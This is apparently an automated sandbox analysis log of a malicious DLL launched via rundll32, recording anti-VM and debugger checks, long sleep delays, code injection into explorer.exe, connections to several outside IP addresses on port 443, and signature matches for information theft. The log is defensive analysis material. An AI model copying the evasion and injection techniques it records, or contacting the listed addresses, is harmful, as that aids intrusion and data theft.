                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exe Code function: GetAdaptersInfo,GetAdaptersInfo,
                      Source: C:\Windows\explorer.exe Code function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA,
                      Source: C:\Windows\explorer.exe Code function: GetAdaptersInfo,
                      Source: C:\Windows\System32\rundll32.exe Window / User API: threadDelayed 5001
                      Source: C:\Windows\System32\rundll32.exe Window / User API: threadDelayed 4879
                      Source: C:\Windows\explorer.exe Window / User API: threadDelayed 468
                      Source: C:\Windows\explorer.exe Window / User API: threadDelayed 8936
                      Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 694
                      Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 672
                      Source: C:\Windows\System32\rundll32.exe API coverage: 2.5 %
                      Source: C:\Windows\System32\loaddll64.exe TID: 6660 Thread sleep time: -120000s >= -30000s
                      Source: C:\Windows\System32\rundll32.exe TID: 7324 Thread sleep count: 5001 > 30
                      Source: C:\Windows\System32\rundll32.exe TID: 7324 Thread sleep time: -300060000s >= -30000s
                      Source: C:\Windows\System32\rundll32.exe TID: 7324 Thread sleep count: 4879 > 30
                      Source: C:\Windows\System32\rundll32.exe TID: 7324 Thread sleep time: -292740000s >= -30000s
                      Source: C:\Windows\explorer.exe TID: 7704 Thread sleep time: -224000s >= -30000s
                      Source: C:\Windows\explorer.exe TID: 7728 Thread sleep time: -46800s >= -30000s
                      Source: C:\Windows\explorer.exe TID: 7704 Thread sleep time: -8936000s >= -30000s
                      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                      Source: C:\Windows\System32\rundll32.exe Code function: 6_2_00000001800192B8 FindFirstFileExW,
                      Source: C:\Windows\explorer.exe Code function: 22_2_013A8BA8 FindFirstFileW,FindNextFileW,LoadLibraryW,
                      Source: C:\Windows\explorer.exe Code function: 22_2_013A1A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,
                      Source: C:\Windows\explorer.exe Code function: 22_2_013ADCE0 FindFirstFileW,
                      Source: C:\Windows\System32\loaddll64.exe Thread delayed: delay time: 120000
                      Source: C:\Windows\System32\rundll32.exe Thread delayed: delay time: 60000
                      Source: explorer.exe, 00000016.00000000.1849178409.00000000098A8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                      Source: Amcache.hve.9.dr Binary or memory string: VMware
                      Source: Amcache.hve.9.dr Binary or memory string: VMware Virtual USB Mouse
                      Source: explorer.exe, 00000016.00000000.1844548016.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
                      Source: Amcache.hve.9.dr Binary or memory string: vmci.syshbin
                      Source: Amcache.hve.9.dr Binary or memory string: VMware, Inc.
                      Source: Amcache.hve.9.dr Binary or memory string: VMware20,1hbin@
                      Source: Amcache.hve.9.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                      Source: Amcache.hve.9.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: Amcache.hve.9.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                      Source: rundll32.exe, 00000012.00000002.2938154508.0000029211558000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.00000292115BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882651450.00000292115BC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.00000292115BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284190577.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311847302.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.00000292115AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                      Source: Amcache.hve.9.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: explorer.exe, 00000016.00000000.1849178409.0000000009977000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                      Source: Amcache.hve.9.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                      Source: Amcache.hve.9.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
                      Source: Amcache.hve.9.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: explorer.exe, 00000016.00000000.1847916203.0000000009815000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NECVMWar VMware SATA CD00\w
                      Source: explorer.exe, 00000016.00000002.2940539964.00000000078A0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
                      Source: Amcache.hve.9.dr Binary or memory string: vmci.sys
                      Source: explorer.exe, 00000016.00000000.1849178409.00000000098A8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                      Source: Amcache.hve.9.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                      Source: Amcache.hve.9.dr Binary or memory string: vmci.syshbin`
                      Source: Amcache.hve.9.dr Binary or memory string: \driver\vmci,\driver\pci
                      Source: explorer.exe, 00000016.00000000.1849178409.0000000009977000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
                      Source: explorer.exe, 00000016.00000002.2940539964.00000000078AD000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTTAVMWare
                      Source: Amcache.hve.9.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: explorer.exe, 00000016.00000000.1847916203.0000000009815000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
                      Source: Amcache.hve.9.dr Binary or memory string: VMware20,1
                      Source: Amcache.hve.9.dr Binary or memory string: Microsoft Hyper-V Generation Counter
                      Source: Amcache.hve.9.dr Binary or memory string: NECVMWar VMware SATA CD00
                      Source: Amcache.hve.9.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
                      Source: Amcache.hve.9.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                      Source: Amcache.hve.9.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                      Source: Amcache.hve.9.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                      Source: Amcache.hve.9.dr Binary or memory string: VMware PCI VMCI Bus Device
                      Source: Amcache.hve.9.dr Binary or memory string: VMware VMCI Bus Device
                      Source: Amcache.hve.9.dr Binary or memory string: VMware Virtual RAM
                      Source: Amcache.hve.9.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007A34000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWen-GBnx
                      Source: explorer.exe, 00000016.00000002.2942821965.0000000009660000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
                      Source: explorer.exe, 00000016.00000000.1844548016.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                      Source: explorer.exe, 00000016.00000000.1844548016.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: Amcache.hve.9.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
                      Source: C:\Windows\System32\rundll32.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\explorer.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\explorer.exeProcess information queried: ProcessInformation
                      Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPort
                      Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPort
                      Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPort
                      Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPort
                      Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPort
                      Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPort
                      Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPort
                      Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPort
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800118B8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018000D1F4 GetLastError,IsDebuggerPresent,OutputDebugStringW,
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001AC34 GetProcessHeap,
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800118B8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018000E470 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018000D638 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\rundll32.exe | Network Connect: 138.124.183.215 443
Source: C:\Windows\System32\rundll32.exe | Network Connect: 3.69.236.35 443
Source: C:\Windows\System32\rundll32.exe | Network Connect: 91.194.11.183 443
Source: C:\Windows\System32\rundll32.exe | Network Connect: 54.175.181.104 443
Source: C:\Windows\System32\rundll32.exe | Network Connect: 95.164.68.73 443
Source: C:\Windows\explorer.exe | Network Connect: 104.21.16.155 443
Source: C:\Windows\System32\rundll32.exe | Memory allocated: C:\Windows\explorer.exe base: 13A0000 protect: page execute and read and write
Source: C:\Windows\System32\rundll32.exe | Code function: 18_3_00007DF4F0240100 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,
Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_000000026E7A1370 Sleep,SleepEx,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,WaitForSingleObject,
Source: C:\Windows\System32\rundll32.exe | Thread created: C:\Windows\explorer.exe EIP: 13A0000
Source: C:\Windows\System32\rundll32.exe | Memory written: C:\Windows\explorer.exe base: 13A0000 value starts with: 4D5A
Source: C:\Windows\System32\rundll32.exe | Memory written: PID: 2580 base: 13A0000 value: 4D
Source: C:\Windows\System32\rundll32.exe | Thread register set: target process: 6516
Source: C:\Windows\System32\rundll32.exe | Thread register set: target process: 6516
Source: C:\Windows\System32\rundll32.exe | Thread register set: target process: 6516
Source: C:\Windows\System32\rundll32.exe | Thread register set: target process: 6516
Source: C:\Windows\System32\rundll32.exe | Thread register set: target process: 6516
Source: C:\Windows\System32\rundll32.exe | Thread register set: 6516 1
Source: C:\Windows\System32\rundll32.exe | Memory written: C:\Windows\explorer.exe base: 13A0000
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",#1
Source: explorer.exe, 00000016.00000002.2942821965.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940227099.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1847916203.0000000009815000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000016.00000000.1844891451.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000016.00000002.2938046859.00000000018A0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Source: explorer.exe, 00000016.00000002.2937197092.0000000001248000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1844548016.0000000001240000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 1Progman$
Source: explorer.exe, 00000016.00000000.1844891451.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000016.00000002.2938046859.00000000018A0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: explorer.exe, 00000016.00000000.1844891451.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000016.00000002.2938046859.00000000018A0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: }Program Manager
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_00000001800206B0 cpuid
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000000018000E5BC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
Source: C:\Windows\explorer.exe | Code function: 22_2_013A7318 GetUserNameA,wsprintfA,
Source: C:\Windows\explorer.exe | Code function: 22_2_013ADB28 GetVersionExW,
Source: Amcache.hve.9.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.9.dr | Binary or memory string: msmpeng.exe
Source: Amcache.hve.9.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.9.dr | Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Source: Yara match | File source: 18.2.rundll32.exe.29211650000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 18.2.rundll32.exe.292116a0000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 18.2.rundll32.exe.292116a0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000012.00000002.2938671459.0000029211650000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.2938735431.00000292116A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000003.1868997096.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000003.1843049394.0000029213423000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
